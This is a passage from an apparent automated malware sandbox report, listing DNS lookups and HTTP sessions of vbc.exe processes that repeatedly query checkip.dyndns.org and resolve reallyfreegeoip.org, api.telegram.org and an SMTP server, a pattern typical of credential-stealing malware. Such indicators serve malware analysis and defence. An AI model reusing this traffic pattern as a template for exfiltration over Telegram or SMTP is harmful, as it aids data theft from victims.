                                                                                                                                            Jan 13, 2025 13:05:39.864368916 CET1.1.1.1192.168.2.80xe88fNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:39.864368916 CET1.1.1.1192.168.2.80xe88fNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:39.864368916 CET1.1.1.1192.168.2.80xe88fNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:39.864368916 CET1.1.1.1192.168.2.80xe88fNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:39.864368916 CET1.1.1.1192.168.2.80xe88fNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:52.814594030 CET1.1.1.1192.168.2.80xdb41No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:59.277693033 CET1.1.1.1192.168.2.80xf383No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:59.277693033 CET1.1.1.1192.168.2.80xf383No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:59.277693033 CET1.1.1.1192.168.2.80xf383No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:05:59.277693033 CET1.1.1.1192.168.2.80xf383No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:06:05.030498028 CET1.1.1.1192.168.2.80xb7a2Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:06:09.315680981 CET1.1.1.1192.168.2.80x5400No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:06:09.315680981 CET1.1.1.1192.168.2.80x5400No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:06:09.315680981 CET1.1.1.1192.168.2.80x5400No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                                                            Jan 13, 2025 13:06:09.315680981 CET1.1.1.1192.168.2.80x5400No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • reallyfreegeoip.org
                                                                                                                                            • api.telegram.org
                                                                                                                                            • checkip.dyndns.org

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.849709132.226.8.169801532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 13, 2025 13:05:35.151985884 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:38.745192051 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:38 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                            Jan 13, 2025 13:05:38.750349998 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Jan 13, 2025 13:05:39.806827068 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:39 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                            Jan 13, 2025 13:05:40.518444061 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Jan 13, 2025 13:05:41.813323975 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:41 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.849712132.226.8.169803760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 13, 2025 13:05:38.148119926 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:39.734622955 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:39 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                            Jan 13, 2025 13:05:39.739144087 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Jan 13, 2025 13:05:42.033809900 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:41 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                            Jan 13, 2025 13:05:42.728001118 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Jan 13, 2025 13:05:43.021131992 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:42 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.849717132.226.8.169801532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 13, 2025 13:05:42.461639881 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Jan 13, 2025 13:05:43.287961960 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:43 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.849720132.226.8.169803760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 13, 2025 13:05:43.635449886 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Jan 13, 2025 13:05:44.462898970 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:44 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.849721132.226.8.169801532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 13, 2025 13:05:43.908154011 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Jan 13, 2025 13:05:44.749408007 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:44 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.849724132.226.8.169803760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 13, 2025 13:05:45.054955959 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:46.057955980 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:45 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.849725132.226.8.169801532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 13, 2025 13:05:45.404594898 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:46.250083923 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:46 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            7192.168.2.849728132.226.8.169803760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 13, 2025 13:05:46.681027889 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:47.488533974 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:47 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            8192.168.2.849729132.226.8.169801532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 13, 2025 13:05:46.871540070 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:47.678854942 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:47 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            9192.168.2.849732132.226.8.169803760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 13, 2025 13:05:48.122523069 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:48.993649960 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:48 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            10192.168.2.849733132.226.8.169801532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 13, 2025 13:05:48.318278074 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:49.173690081 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:49 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            11192.168.2.849738132.226.8.169803760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 13, 2025 13:05:49.605870962 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:50.454339981 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:50 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            12192.168.2.849739132.226.8.169801532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 13, 2025 13:05:49.815552950 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:50.664736032 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:50 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            13192.168.2.849744132.226.8.169803760C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 13, 2025 13:05:51.081343889 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:51.924890995 CET273INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:51 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            14192.168.2.849745132.226.8.169801532C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Jan 13, 2025 13:05:51.291662931 CET151OUTGET / HTTP/1.1
